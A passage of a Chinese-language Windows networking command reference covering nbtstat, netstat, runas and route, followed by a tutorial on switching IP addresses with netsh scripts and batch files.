顯示遠(yuǎn)程計(jì)算機(jī)的 NetBIOS 名稱表，其名稱由遠(yuǎn)程計(jì)算機(jī)的 IP 地址指定（以小數(shù)點(diǎn)分隔）。
-c
顯示 NetBIOS 名稱緩存內(nèi)容、NetBIOS 名稱表及其解析的各個(gè)地址。
-n
顯示本地計(jì)算機(jī)的 NetBIOS 名稱表。Registered 中的狀態(tài)表明該名稱是通過廣播或 WINS 服務(wù)器注冊(cè)的。
-r
顯示 NetBIOS 名稱解析統(tǒng)計(jì)資料。在配置為使用 WINS 的 Windows XP 計(jì)算機(jī)上，該參數(shù)將返回已通過廣播和 WINS 解析和注冊(cè)的名稱號(hào)碼。
-R
清除 NetBIOS 名稱緩存的內(nèi)容并從 Lmhosts 文件中重新加載帶有 #PRE 標(biāo)記的項(xiàng)目。
-RR
重新釋放并刷新通過 WINS 注冊(cè)的本地計(jì)算機(jī)的 NetBIOS 名稱。
-s
顯示 NetBIOS 客戶和服務(wù)器會(huì)話，并試圖將目標(biāo) IP 地址轉(zhuǎn)化為名稱。
-S
顯示 NetBIOS 客戶和服務(wù)器會(huì)話，只通過 IP 地址列出遠(yuǎn)程計(jì)算機(jī)。
Interval
重新顯示選擇的統(tǒng)計(jì)資料，可以中斷每個(gè)顯示之間的 Interval 中指定的秒數(shù)。按 CTRL+C 停止重新顯示統(tǒng)計(jì)信息。如果省略該參數(shù)， netstat 將只顯示一次當(dāng)前的配置信息。
/?
在命令提示符顯示幫助。
注釋
Nbtstat 命令行參數(shù)區(qū)分大小寫。
下表列出了由 Nbtstat 生成的列標(biāo)題。 標(biāo)題 說明
Input 接收的字節(jié)數(shù)。
Output 發(fā)送的字節(jié)數(shù)。
In/Out 該連接是否從計(jì)算機(jī)（傳出）或者其他計(jì)算機(jī)到本地計(jì)算機(jī)（傳入）。
Lift 名稱表緩存項(xiàng)在被清除之前所存留的時(shí)間。
Local Name 本地 NetBIOS 名稱與連接相關(guān)聯(lián)。
Remote Host 與遠(yuǎn)程計(jì)算機(jī)相關(guān)的名稱或 IP 地址。
<03> 轉(zhuǎn)化為十六進(jìn)制的 NetBIOS 名稱的最后一個(gè)字節(jié)。每個(gè) NetBIOS 名稱長度均為 16 個(gè)字符。由于最后一個(gè)字節(jié)通常有特殊的意義，因?yàn)橄嗤拿Q（只有最后一個(gè)字節(jié)不同）可能在一臺(tái)計(jì)算機(jī)上出現(xiàn)幾次。例如，<20> 在 ASCII 文本中是一個(gè)空格。
Type 名稱類型。名稱可以是單個(gè)名稱，也可以是組名稱。
Status 遠(yuǎn)程計(jì)算機(jī)上是否在運(yùn)行 NetBIOS 服務(wù)（"已注冊(cè)"），或同一計(jì)算機(jī)名是否已注冊(cè)了相同的服務(wù)（"沖突"）。
State NetBIOS 連接的狀態(tài)。

?

下表列出了可能的 NetBIOS 連接狀態(tài)。 狀態(tài) 說明
已連接 會(huì)話已建立。
關(guān)聯(lián) 連接的終結(jié)點(diǎn)已經(jīng)被創(chuàng)建并與 IP 地址關(guān)聯(lián)。
正接聽 該終結(jié)點(diǎn)對(duì)內(nèi)向連接可用。
空閑 該結(jié)束點(diǎn)已被打開單不能接收連接。
正在連接 會(huì)話處于連接階段。在此階段正在解析所選目標(biāo)的由名稱到 IP 地址的映射。
接受 入站會(huì)話當(dāng)前正在被接受，將在短期內(nèi)連接。
重新連接 會(huì)話將試圖重新連接（如果第一次連接失敗）。
出站 會(huì)話正處于連接階段。此階段正在創(chuàng)建 TCP 連接。
入站 入站會(huì)話在連接期。
正在斷開 會(huì)話正在斷開連接。
已中斷連接 本地計(jì)算機(jī)已斷開連接，并正等待遠(yuǎn)程系統(tǒng)的確認(rèn)。

?

只有當(dāng)網(wǎng)際協(xié)議 (TCP/IP) 協(xié)議在 網(wǎng)絡(luò)連接中安裝為網(wǎng)絡(luò)適配器屬性的組件時(shí)，該命令才可用。
范例
要顯示 NetBIOS 計(jì)算機(jī)名為 CORP07 的遠(yuǎn)程計(jì)算機(jī)的 NetBIOS 名稱表，請(qǐng)鍵入：

?

nbtstat -a CORP07

?

要顯示所分配 IP 地址為 10.0.0.99 的遠(yuǎn)程計(jì)算機(jī)的 NetBIOS 名稱表，請(qǐng)鍵入：

?

nbtstat -A 10.0.0.99

?

要顯示本地計(jì)算機(jī)的 NetBIOS 名稱表，請(qǐng)鍵入：

?

nbtstat -n

?

要顯示本地計(jì)算機(jī) NetBIOS 名稱緩存的內(nèi)容，請(qǐng)鍵入：

?

nbtstat -c

?

要清除 NetBIOS 名稱緩存并重新裝載本地 Lmhosts 文件中帶標(biāo)記 #PRE 的項(xiàng)目，請(qǐng)鍵入：

?

nbtstat -R

?

要釋放通過 WINS 服務(wù)器注冊(cè)的 NetBIOS 名稱并對(duì)其重新注冊(cè)，請(qǐng)鍵入：

?

nbtstat -RR

?

要每隔 5 秒以 IP 地址顯示 NetBIOS 會(huì)話統(tǒng)計(jì)資料，請(qǐng)鍵入：

?

nbtstat -S 5

?

17.Netstat
顯 示活動(dòng)的 TCP 連接、計(jì)算機(jī)偵聽的端口、以太網(wǎng)統(tǒng)計(jì)信息、IP 路由表、IPv4 統(tǒng)計(jì)信息（對(duì)于 IP、ICMP、TCP 和 UDP 協(xié)議）以及 IPv6 統(tǒng)計(jì)信息（對(duì)于 IPv6、ICMPv6、通過 IPv6 的 TCP 以及通過 IPv6 的 UDP 協(xié)議）。使用時(shí)如果不帶參數(shù)，netstat 顯示活動(dòng)的 TCP 連接。

?

語法
netstat [-a] [-e] [-n] [-o] [-p Protocol] [-r] [-s] [Interval]

?

參數(shù)
-a
顯示所有活動(dòng)的 TCP 連接以及計(jì)算機(jī)偵聽的 TCP 和 UDP 端口。
-e
顯示以太網(wǎng)統(tǒng)計(jì)信息，如發(fā)送和接收的字節(jié)數(shù)、數(shù)據(jù)包數(shù)。該參數(shù)可以與 -s 結(jié)合使用。
-n
顯示活動(dòng)的 TCP 連接，不過，只以數(shù)字形式表現(xiàn)地址和端口號(hào)，卻不嘗試確定名稱。
-o
顯示活動(dòng)的 TCP 連接并包括每個(gè)連接的進(jìn)程 ID (PID)。可以在 Windows 任務(wù)管理器中的"進(jìn)程"選項(xiàng)卡上找到基于 PID 的應(yīng)用程序。該參數(shù)可以與 -a、-n 和 -p 結(jié)合使用。
-p Protocol
顯 示 Protocol 所指定的協(xié)議的連接。在這種情況下，Protocol 可以是 tcp、udp、tcpv6 或 udpv6。如果該參數(shù)與 -s 一起使用按協(xié)議顯示統(tǒng)計(jì)信息，則 Protocol 可以是 tcp、udp、icmp、ip、tcpv6、udpv6、icmpv6 或 ipv6。
-s
按協(xié)議顯示統(tǒng)計(jì)信息。默認(rèn)情況下，顯示 TCP、UDP、ICMP 和 IP 協(xié)議的統(tǒng)計(jì)信息。如果安裝了 Windows XP 的 IPv6 協(xié)議，就會(huì)顯示有關(guān) IPv6 上的 TCP、IPv6 上的 UDP、ICMPv6 和 IPv6 協(xié)議的統(tǒng)計(jì)信息。可以使用 -p 參數(shù)指定協(xié)議集。
-r
顯示 IP 路由表的內(nèi)容。該參數(shù)與 route print 命令等價(jià)。
Interval
每隔 Interval 秒重新顯示一次選定的信息。按 CTRL+C 停止重新顯示統(tǒng)計(jì)信息。如果省略該參數(shù)，netstat 將只打印一次選定的信息。
/?
在命令提示符顯示幫助。
注釋
與該命令一起使用的參數(shù)必須以連字符 (-) 而不是以短斜線 (/) 作為前綴。
Netstat 提供下列統(tǒng)計(jì)信息：
Proto
協(xié)議的名稱（TCP 或 UDP）。

?

Local Address
本地計(jì)算機(jī)的 IP 地址和正在使用的端口號(hào)。如果不指定 -n 參數(shù)，就顯示與 IP 地址和端口的名稱對(duì)應(yīng)的本地計(jì)算機(jī)名稱。如果端口尚未建立，端口以星號(hào)（*）顯示。

?

Foreign Address
連接該插槽的遠(yuǎn)程計(jì)算機(jī)的 IP 地址和端口號(hào)碼。如果不指定 -n 參數(shù)，就顯示與 IP 地址和端口對(duì)應(yīng)的名稱。如果端口尚未建立，端口以星號(hào)（*）顯示。

?

(state)
表明 TCP 連接的狀態(tài)。可能的狀態(tài)如下：

?

CLOSE_WAIT

?

CLOSED

?

ESTABLISHED

?

FIN_WAIT_1

?

FIN_WAIT_2

?

LAST_ACK

?

LISTEN

?

SYN_RECEIVED

?

SYN_SEND

?

TIMED_WAIT

?

有關(guān) TCP 連接狀態(tài)的信息，請(qǐng)參閱 RFC 793。

?

只有當(dāng)網(wǎng)際協(xié)議 (TCP/IP) 協(xié)議在 網(wǎng)絡(luò)連接中安裝為網(wǎng)絡(luò)適配器屬性的組件時(shí)，該命令才可用。
范例
要想顯示以太網(wǎng)統(tǒng)計(jì)信息和所有協(xié)議的統(tǒng)計(jì)信息，請(qǐng)鍵入下列命令：

?

netstat -e -s

?

要想僅顯示 TCP 和 UDP 協(xié)議的統(tǒng)計(jì)信息，請(qǐng)鍵入下列命令：

?

netstat -s -p tcp udp

?

要想每 5 秒鐘顯示一次活動(dòng)的 TCP 連接和進(jìn)程 ID，請(qǐng)鍵入下列命令：

?

nbtstat -o 5

?

要想以數(shù)字形式顯示活動(dòng)的 TCP 連接和進(jìn)程 ID，請(qǐng)鍵入下列命令：

?

nbtstat -n -o

?

18.Runas
允許用戶用其他權(quán)限運(yùn)行指定的工具和程序，而不是用戶當(dāng)前登錄提供的權(quán)限。

?

語法
runas [{/profile|/noprofile}] [/env] [/netonly] [/smartcard] [/showtrustlevels] [/trustlevel] /user:UserAccountName program

?

參數(shù)
/profile
加載用戶的配置文件。/profile 是默認(rèn)值。
/no profile
/noprofile 指定不加載用戶的配置文件。這使應(yīng)用程序載入的更加快速，但是在一些應(yīng)用程序中也會(huì)引起錯(cuò)誤。
/env
指定當(dāng)前使用的網(wǎng)絡(luò)環(huán)境，而不是用戶的本地環(huán)境。
/netonly
指明指定的用戶信息只用于遠(yuǎn)程訪問。
/smartcard
/smartcard 表示憑據(jù)是否是由智能卡提供的。
/showtrustlevels
列出 /trustlevel 開關(guān)項(xiàng)。
/trustlevel
指定應(yīng)用程序運(yùn)行所在的授權(quán)級(jí)別。使用 /showtrustlevels 查看可用的信任級(jí)別。
/user:UserAccountName
指定在其下運(yùn)行程序的用戶帳戶的名稱。用戶帳戶的格式應(yīng)是 user@domain 或 domain\user。
程序
指定要用在 /user 中指定的帳戶運(yùn)行的程序或命令。
/?
在命令提示符顯示幫助。
注釋
管理員可以使用一個(gè)權(quán)限受限制的帳戶執(zhí)行日常、非管理性的任務(wù)，只有在執(zhí)行特定管理任務(wù)時(shí)，才使用一個(gè)權(quán)限更大的帳戶。要不經(jīng)過注銷再重新登錄就完成這樣的任務(wù)，可以用一般帳戶登錄，然后使用 runas 命令來運(yùn)行需要更大權(quán)限的工具。
有關(guān) runas 命令的使用范例，請(qǐng)參閱"相關(guān)主題"。
盡管 runas 通常由 Administrator 帳戶使用，但并非僅限于 Administrator 帳戶。任何擁有多個(gè)帳戶的用戶均可以利用備用憑據(jù)，使用 runas 運(yùn)行程序、MMC 控制臺(tái)或"控制面板"項(xiàng)。
如果要在計(jì)算機(jī)上使用 Administrator 帳戶，對(duì)于 /user:，鍵入下列參數(shù)之一：
/user:AdministratorAccountName@ComputerName

?

/user:ComputerName\AdministratorAccountName

?

如果想以域管理員身份使用這個(gè)命令，鍵入下列參數(shù)之一：
/user:AdministratorAccountName@DomainName

?

/useromainName\AdministratorAccountName

?

runas 命令允許您運(yùn)行程序 (*.exe)、保存的 MMC 控制臺(tái) (*.msc)、程序和保存的 MMC 控制臺(tái)的快捷方式及"控制面板"項(xiàng)。作為另一組（例如"Users"或"ower Users"組）的成員登錄到計(jì)算機(jī)時(shí)，可以以管理員的身份運(yùn)行。
可以使用 runas 命令來啟動(dòng)任何程序、MMC 控制器或"控制面板"項(xiàng)。只要提供適當(dāng)?shù)挠脩魩艉兔艽a信息，用戶帳戶就具有登錄到計(jì)算機(jī)的能力，并且程序、MMC 控制臺(tái)、"控制面板"項(xiàng)在系統(tǒng)中及對(duì)該用戶帳戶均可用.
runas 命令允許您管理其他域的服務(wù)器（運(yùn)行工具的計(jì)算機(jī)和要管理的服務(wù)器在不同的域中）。
如果嘗試使用 runas 從網(wǎng)絡(luò)位置啟動(dòng)程序、MMC 控制臺(tái)或"控制面板"項(xiàng)，可能會(huì)因?yàn)橛脕磉B接網(wǎng)絡(luò)共享的憑據(jù)與用來啟動(dòng)程序的憑據(jù)不同而失敗。后者的憑據(jù)可能無法訪問同一網(wǎng)絡(luò)共享。
有些項(xiàng)，例如"打印機(jī)"文件夾和桌面項(xiàng)，間接由 Windows 2000 打開，而不能使用 runas 命令啟動(dòng)。
如果 runas 命令失敗，則可能是沒有運(yùn)行 RunAs 服務(wù)或使用的用戶帳戶無效。要檢查 RunAs 服務(wù)的狀態(tài)，請(qǐng)?jiān)?#34;計(jì)算機(jī)管理"中單擊"服務(wù)和應(yīng)用程序"，然后單擊"服務(wù)"。要測(cè)試用戶帳戶，請(qǐng)嘗試使用該帳戶登錄合適的域。
范例
要在本地計(jì)算機(jī)上以管理員身份啟動(dòng) Windows 2000 命令提示行實(shí)例，請(qǐng)鍵入：

?

runas /user:localmachinename\administrator cmd
系統(tǒng)提示時(shí)，鍵入管理員密碼。

?

要 使用名為 companydomain\domainadmin 的域管理員帳戶啟動(dòng)"計(jì)算機(jī)管理"管理單元實(shí)例，請(qǐng)鍵入： runas /user:companydomain\domainadmin "mmc %windir%\system32\compmgmt.msc"
當(dāng)提示時(shí)，鍵入帳戶密碼。

?

要使用名為 domain.microsoft.com 的域中的域管理員帳戶 user 啟動(dòng)"記事本"實(shí)例，請(qǐng)鍵入：

?

runas /user:user@domain.microsoft.com "notepad my_file.txt"
當(dāng)提示時(shí)，鍵入帳戶密碼。

?

要啟動(dòng)命令提示符行窗口、保存的 MMC 控制臺(tái)、控制面板項(xiàng)或管理其他地點(diǎn)服務(wù)器的程序的一個(gè)實(shí)例，請(qǐng)鍵入：

?

runas /netonly /user:domain\username "command"
domain\username 必須是有足夠權(quán)限管理服務(wù)器的用戶。當(dāng)提示時(shí)，鍵入帳戶密碼。
19.Route
在本地 IP 路由表中顯示和修改條目。使用不帶參數(shù)的 route 可以顯示幫助。

?

語法
route [-f] [-p] [Command [Destination] [mask Netmask] [Gateway] [metric Metric]] [if Interface]]

?

參數(shù)
-f
清 除所有不是主路由（網(wǎng)掩碼為 255.255.255.255 的路由）、環(huán)回網(wǎng)絡(luò)路由（目標(biāo)為 127.0.0.0，網(wǎng)掩碼為 255.255.255.0 的路由）或多播路由（目標(biāo)為 224.0.0.0，網(wǎng)掩碼為 240.0.0.0 的路由）的條目的路由表。如果它與命令之一（例如 add、change 或 delete）結(jié)合使用，表會(huì)在運(yùn)行命令之前清除。
-p
與 add 命令共同使用時(shí)，指定路由被添加到注冊(cè)表并在啟動(dòng) TCP/IP 協(xié)議的時(shí)候初始化 IP 路由表。默認(rèn)情況下，啟動(dòng) TCP/IP 協(xié)議時(shí)不會(huì)保存添加的路由。與 print 命令一起使用時(shí)，則顯示永久路由列表。所有其它的命令都忽略此參數(shù)。永久路由存儲(chǔ)在注冊(cè)表中的位置是 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\PersistentRoutes。
Command
指定要運(yùn)行的命令。下表列出了有效的命令。 命令 目的
add 添加路由
change 更改現(xiàn)存路由
delete 刪除路由
print 打印路由

?

Destination
指定路由的網(wǎng)絡(luò)目標(biāo)地址。目標(biāo)地址可以是一個(gè) IP 網(wǎng)絡(luò)地址（其中網(wǎng)絡(luò)地址的主機(jī)地址位設(shè)置為 0），對(duì)于主機(jī)路由是 IP 地址，對(duì)于默認(rèn)路由是 0.0.0.0。
mask subnetmask
指 定與網(wǎng)絡(luò)目標(biāo)地址相關(guān)聯(lián)的網(wǎng)掩碼（又稱之為子網(wǎng)掩碼）。子網(wǎng)掩碼對(duì)于 IP 網(wǎng)絡(luò)地址可以是一適當(dāng)?shù)淖泳W(wǎng)掩碼，對(duì)于主機(jī)路由是 255.255.255.255 ，對(duì)于默認(rèn)路由是 0.0.0.0。如果忽略，則使用子網(wǎng)掩碼 255.255.255.255。定義路由時(shí)由于目標(biāo)地址和子網(wǎng)掩碼之間的關(guān)系，目標(biāo)地址不能比它對(duì)應(yīng)的子網(wǎng)掩碼更為詳細(xì)。換句話說，如果子網(wǎng)掩碼的一位 是 0，則目標(biāo)地址中的對(duì)應(yīng)位就不能設(shè)置為 1。
Gateway
指定超過由網(wǎng)絡(luò)目標(biāo)和子網(wǎng)掩碼定義的可達(dá)到的地址集的前一個(gè)或下一 個(gè)躍點(diǎn) IP 地址。對(duì)于本地連接的子網(wǎng)路由，網(wǎng)關(guān)地址是分配給連接子網(wǎng)接口的 IP 地址。對(duì)于要經(jīng)過一個(gè)或多個(gè)路由器才可用到的遠(yuǎn)程路由，網(wǎng)關(guān)地址是一個(gè)分配給相鄰路由器的、可直接達(dá)到的 IP 地址。
metric Metric
為路由指定所需躍點(diǎn)數(shù)的整數(shù)值（范圍是 1 ~ 9999），它用來在路由表里的多個(gè)路由中選擇與轉(zhuǎn)發(fā)包中的目標(biāo)地址最為匹配的路由。所選的路由具有最少的躍點(diǎn)數(shù)。躍點(diǎn)數(shù)能夠反映躍點(diǎn)的數(shù)量、路徑的速度、路徑可靠性、路徑吞吐量以及管理屬性。
if Interface
指定目標(biāo)可以到達(dá)的接口的接口索引。使用 route print 命令可以顯示接口及其對(duì)應(yīng)接口索引的列表。對(duì)于接口索引可以使用十進(jìn)制或十六進(jìn)制的值。對(duì)于十六進(jìn)制值，要在十六進(jìn)制數(shù)的前面加上 0x。忽略 if 參數(shù)時(shí)，接口由網(wǎng)關(guān)地址確定。
/?
在命令提示符顯示幫助。
注釋
路 由表中 躍點(diǎn)數(shù) 一列的值較大是由于允許 TCP/IP 根據(jù)每個(gè) LAN 接口的 IP 地址、子網(wǎng)掩碼和默認(rèn)網(wǎng)關(guān)的配置自動(dòng)確定路由表中路由的躍點(diǎn)數(shù)造成的。默認(rèn)啟動(dòng)的自動(dòng)確定接口躍點(diǎn)數(shù)確定了每個(gè)接口的速度，調(diào)整了每個(gè)接口的路由躍點(diǎn)數(shù)， 因此最快接口所創(chuàng)建的路由具有最低的躍點(diǎn)數(shù)。要?jiǎng)h除大躍點(diǎn)數(shù)，請(qǐng)?jiān)诿總€(gè) LAN 連接的 TCP/IP 協(xié)議的高級(jí)屬性中禁用自動(dòng)確定接口躍點(diǎn)數(shù)。
如 果在 systemroot\System32\Drivers\Etc 文件夾的本地網(wǎng)絡(luò)文件中存在適當(dāng)?shù)臈l目，名稱可以用于 Destination。只要名稱可以通過"域名系統(tǒng)" (DNS) 查詢這樣的標(biāo)準(zhǔn)主機(jī)名解析技術(shù)分解為 IP 地址，就可以將其用于 Gateway，DNS 查詢使用存儲(chǔ)在 systemroot\System32\Drivers\Etc 文件夾下的本地主機(jī)文件和 NetBIOS 名稱解析。
如果是 print 或 delete 命令，可以忽略 Gateway 參數(shù)，使用通配符來表示目標(biāo)和網(wǎng)關(guān)。Destination 的值可以是由星號(hào) (*) 指定的通配符。如果指定目標(biāo)含有一個(gè)星號(hào) (*) 或問號(hào) (?)，它被看作是通配符，只打印或刪除匹配的目標(biāo)路由。星號(hào)代表任意一字符序列，問號(hào)代表任一字符。例如， 10.*.1, 192.168.*、 127.* 和 *224* 都是星號(hào)通配符的有效使用。
使用了無效的目標(biāo)和子網(wǎng)掩碼（網(wǎng)掩碼）值的組合，會(huì)顯示"Route:bad gateway address netmask"錯(cuò)誤消息。目標(biāo)中有一位或多位設(shè)置為 1，而其在子網(wǎng)掩碼中的對(duì)應(yīng)位設(shè)置為 0 時(shí)會(huì)發(fā)生這個(gè)錯(cuò)誤。可以通過二進(jìn)制表示法表示目標(biāo)和子網(wǎng)掩碼來檢查這種情況。以二進(jìn)制表示的子網(wǎng)掩碼包括表示目標(biāo)網(wǎng)絡(luò)地址部分的一連串的 1 和表示目標(biāo)主機(jī)地址部分的一連串的 0 兩個(gè)部分。查看目標(biāo)以確定目標(biāo)的主機(jī)地址部分（由子網(wǎng)掩碼所定義）是否有些位設(shè)置成了 1。
只有 Windows NT 4.0、Windows 2000、Windows Millennium Edition 和 Windows XP 的 route 命令支持 -p 參數(shù)。Windows 95 或 Windows 98 的 route 命令不支持該參數(shù)。
只有當(dāng)網(wǎng)際協(xié)議 (TCP/IP) 協(xié)議在 網(wǎng)絡(luò)連接中安裝為網(wǎng)絡(luò)適配器屬性的組件時(shí)，該命令才可用。
范例
要顯示 IP 路由表的完整內(nèi)容，請(qǐng)鍵入：

?

route print

?

要顯示 IP 路由表中以 10. 開始的路由，請(qǐng)鍵入：

?

route print 10.*

?

要添加默認(rèn)網(wǎng)關(guān)地址為 192.168.12.1 的默認(rèn)路由，請(qǐng)鍵入：

?

route add 0.0.0.0 mask 0.0.0.0 192.168.12.1

?

要添加目標(biāo)為 10.41.0.0，子網(wǎng)掩碼為 255.255.0.0，下一個(gè)躍點(diǎn)地址為 10.27.0.1 的路由，請(qǐng)鍵入：

?

route add 10.41.0.0 mask 255.255.0.0 10.27.0.1

?

要添加目標(biāo)為 10.41.0.0，子網(wǎng)掩碼為 255.255.0.0，下一個(gè)躍點(diǎn)地址為 10.27.0.1 的永久路由，請(qǐng)鍵入：

?

route -p add 10.41.0.0 mask 255.255.0.0 10.27.0.1

?

要添加目標(biāo)為 10.41.0.0，子網(wǎng)掩碼為 255.255.0.0，下一個(gè)躍點(diǎn)地址為 10.27.0.1，躍點(diǎn)數(shù)為 7 的路由，請(qǐng)鍵入：

?

route add 10.41.0.0 mask 255.255.0.0 10.27.0.1 metric 7

?

要添加目標(biāo)為 10.41.0.0，子網(wǎng)掩碼為 255.255.0.0，下一個(gè)躍點(diǎn)地址為 10.27.0.1，接口索引為 0x3 的路由，請(qǐng)鍵入：

?

route add 10.41.0.0 mask 255.255.0.0 10.27.0.1 if 0x3

?

要?jiǎng)h除目標(biāo)為 10.41.0.0，子網(wǎng)掩碼為 255.255.0.0 的路由，請(qǐng)鍵入：

?

route delete 10.41.0.0 mask 255.255.0.0

?

要?jiǎng)h除 IP 路由表中以 10. 開始的所有路由，請(qǐng)鍵入：

?

route delete 10.*

?

要將目標(biāo)為 10.41.0.0，子網(wǎng)掩碼為 255.255.0.0 的路由的下一個(gè)躍點(diǎn)地址由 10.27.0.1 更改為 10.27.0.25，請(qǐng)鍵入：

?

route change 10.41.0.0 mask 255.255.0.0 10.27.0.25

?

怎樣在windowsserver的cmd下更改ip地址■■■ -> Windows 2k/2003 Server
在命令行下更改ip地址

?

Windows2000是現(xiàn)在比較流行的操作系統(tǒng)，它的功能是很強(qiáng)大的，它甚至可以象Unix一樣在命令行下做很多的工作。下面一種在命令行下更改ip地址的方法，現(xiàn)介紹給大家（括號(hào)里是一些注釋，黑體字是人工錄入的）：

?

C:\>ipconfig (首先用ipconfig這個(gè)命令看一下更改之前的ip地址)

?

Windows 2000 IP Configuration

?

Ethernet adapter 本地連接:

?

Connection-specific DNS Suffix . :

?

IP Address. . . . . . . . . . . . : 10.1.1.94 （本地連接更改之前的ip）

?

Subnet Mask . . . . . . . . . . . : 255.255.255.0

?

Default Gateway . . . . . . . . . : 10.1.1.254

?

C:\>netsh （進(jìn)入設(shè)置模式）

?

netsh>interface

?

interface>ip

?

interface ip>set address "本地連接" static 10.1.1.111 255.255.255.0 10.1.1.254

?

interface ip>exit

?

上文中的set命令具體解釋如下:

?

set address - 設(shè)置指定的接口的 IP 地址和默認(rèn)網(wǎng)關(guān)。

?

set dns - 設(shè)置 DNS 服務(wù)器模式和地址。

?

set wins - 設(shè)置 WINS 服務(wù)器模式和地址。
網(wǎng)絡(luò)常用命令：

?

IPCONFIG
C:\>ipconfig （更改后再用ipconfig命令看一下,確認(rèn)一下是否更改成功）

?

Windows 2000 IP Configuration

?

Ethernet adapter 本地連接:

?

Connection-specific DNS Suffix .

?

IP Address. . . . . . . . . . . . : 10.1.1.111

?

Subnet Mask . . . . . . . . . . . : 255.255.255.0

?

Default Gateway . . . . . . . . . : 10.1.1.254

?

命令一覽
.. - 移到上一層上下文級(jí)。
? - 顯示命令列表。
aaaa - 更改到 `aaaa' 上下文。
abort - 丟棄在脫機(jī)模式下所做的更改。
add - 將一個(gè)配置項(xiàng)添加到項(xiàng)目列表中。
alias - 添加一個(gè)別名
bye - 退出程序。
commit - 提交在脫機(jī)模式中所做的更改。
delete - 在項(xiàng)目列表上刪除一個(gè)配置項(xiàng)目。
dhcp - 更改到 `dhcp' 上下文。
dump - 顯示一個(gè)配置腳本。
exec - 運(yùn)行一個(gè)腳本文件。
exit - 退出程序。
help - 顯示命令列表。
interface - 更改到 `interface' 上下文。
offline - 將當(dāng)前模式設(shè)置成脫機(jī)。
online - 將當(dāng)前模式設(shè)置成聯(lián)機(jī)。
popd - 從堆棧上打開一個(gè)上下文。
pushd - 將當(dāng)前上下文放推入堆棧。
quit - 退出程序。
ras - 更改到 `ras' 上下文。
routing - 更改到 `routing' 上下文。
set - 更新配置設(shè)置。
show - 顯示信息
unalias - 刪除一個(gè)別名。
wins - 更改到 `wins' 上下文。
快速切換IP地址有絕招

?

在 工作過程中會(huì)遇到在不同的網(wǎng)段中進(jìn)行網(wǎng)絡(luò)調(diào)試的情況，經(jīng)常需要將機(jī)器在幾個(gè)不同的IP地址中進(jìn)行切換。在Win2000操作系統(tǒng)中改變IP地址較之 Win98已經(jīng)方便多了因?yàn)楦耐闕P地址后不需要重啟計(jì)算機(jī)　，但還要進(jìn)入網(wǎng)絡(luò)屬性設(shè)置中進(jìn)行操作。有沒有再簡便一點(diǎn)的方法呢，比如用鼠標(biāo)雙擊一下快捷 方式就可以實(shí)現(xiàn)IP地址的切換?

?

　　答案是肯定的。在Win2000中用netsh命令就可以實(shí)現(xiàn)這個(gè)功能。首先進(jìn)入命 令行模式（在"開始→運(yùn)行"中鍵入"cmd"即可進(jìn)入命令行模式），在提示符下鍵入netsh即可進(jìn)入netsh的界面。再鍵入int ip進(jìn)入接口IP的配置模式，鍵入dump則列出接口IP配置信息：

?

　　C:\Documents and Settings\Administrator>netsh
　　netsh>
　　netsh>int ip
　　interface ip>dump
　　# ----------------------------------
　　# 接口 IP 配置
　　# ----------------------------------
　　pushd interface ip
　　# 〃本地連接〃 的接口IP 配置（注：以下顯示視具體機(jī)器情況而定）
　　set address name = 〃本地連接〃 source = static addr = 192.168.0.5 mask = 255.255.255.0
　　set address name = 〃本地連接〃 gateway = 192.168.0.2 gwmetric = 1
　　set dns name = 〃本地連接〃 source = static addr = 61.237.17.181
　　add dns name = 〃本地連接〃 addr = 211.97.168.129
　　add dns name = 〃本地連接〃 addr = 211.98.4.1
　　set wins name = 〃本地連接〃 source = static addr = none
　　# 〃本地連接 2〃 的接口 IP 配置
　　set address name = 〃本地連接 2〃 source = dhcp
　　set dns name = 〃本地連接 2〃 source = dhcp
　　set wins name = 〃本地連接 2〃 source = dhcp
　　popd
　　# 接口 IP 配置結(jié)束

?

快速切換IP地址有絕招 2

?

現(xiàn)在我們可以大致了解到用netsh命令更改IP地址的方式，即通過"set address name =連接名稱（連接名稱要用引號(hào)括起來）source=static addr=IP地址 mask=子網(wǎng)掩碼"來實(shí)現(xiàn)。

?

　　到命令行模式下用netsh直接試一下。比如要將本機(jī)的IP地址改為192.168.0.7，子網(wǎng)掩碼為255.255.255.0，可以進(jìn)行以下操作：

?

　　C:\Documents and Settings\Administrator>netsh
　　netsh>int ip
　　interface ip>set address name ="本地連接"source = static addr = 192.168.0.7 mask = 255.255.255.0
　　確認(rèn)更改。
　　interface ip>exit
　　再用ipconfig命令核實(shí)一下：
　　C:\Documents and Settings\Administrator>ipconfig
　　Windows 2000 IP Configuration
　　Ethernet adapter 本地連接 2
　　Media State . . . . . . . . . . .  Cable Disconnected
　　Ethernet adapter 本地連接
　　Connection-specific DNS Suffix . 
　　IP Address. . . . . . . . . . . .  192.168.0.7
　　Subnet Mask . . . . . . . . . . .  255.255.255.0
　　Default Gateway . . . . . . . . .  192.168.0.2

?

　　從以上顯示中可以看到已經(jīng)成功實(shí)現(xiàn)了在Win2000中用命令行方式來改變IP地址。用這種方式改變IP地址甚至還沒有在圖形界面中操作來得快。不過我們?cè)儆媚_本幫一下忙，離勝利目標(biāo)就不遠(yuǎn)了。首先打開記事本，輸入以下內(nèi)容： 　　int ip
　　set address name=〃本地連接〃 source=static addr=192.168.0.7 mask=255.255.255.0

?

　　然后保存為一個(gè)名為"7.sh"的文件，放到C盤根目錄下，再進(jìn)入命令行模式，在C盤根目錄下鍵入"netsh exec 7.sh"，好像沒什么反應(yīng)啊?不過再用ipconfig查看一下，會(huì)發(fā)現(xiàn)IP地址已經(jīng)改過來了。

?

　 　最后再用記事本寫一個(gè)批處理文件，命名為"7.bat"，內(nèi)容為"netsh exec 7.sh"。為該文件在桌面上創(chuàng)建一個(gè)快捷方式，這樣雙擊該快捷方式即可實(shí)現(xiàn)IP地址的快速改變。如果要快速在192.168.0.5、 192.168.0.7等相同網(wǎng)段IP地址間進(jìn)行切換的話，只需要改變"addr"后面的地址即可，但是要將IP地址改為如172.19.96.7之類不 同網(wǎng)段的IP地址，就需要將網(wǎng)關(guān)信息一起改變，也就是在腳本文件中加入一行關(guān)于網(wǎng)關(guān)的信息：

?

　　int ip
　　set address name = 〃本地連接〃source = static addr= 172.19.96.7 mask = 255.255.255.0
　　set address name = 〃本地連接〃gateway = 172.19.96.1 gwmetric = 1

?

　　同樣地將以上內(nèi)容存為腳本文件，再做成批處理文件執(zhí)行一下，用ipconfig/all命令檢測(cè)一下，發(fā)現(xiàn)包括網(wǎng)關(guān)在內(nèi)的信息也修改過來了。這是不是既快又方便，IP地址想換就換?
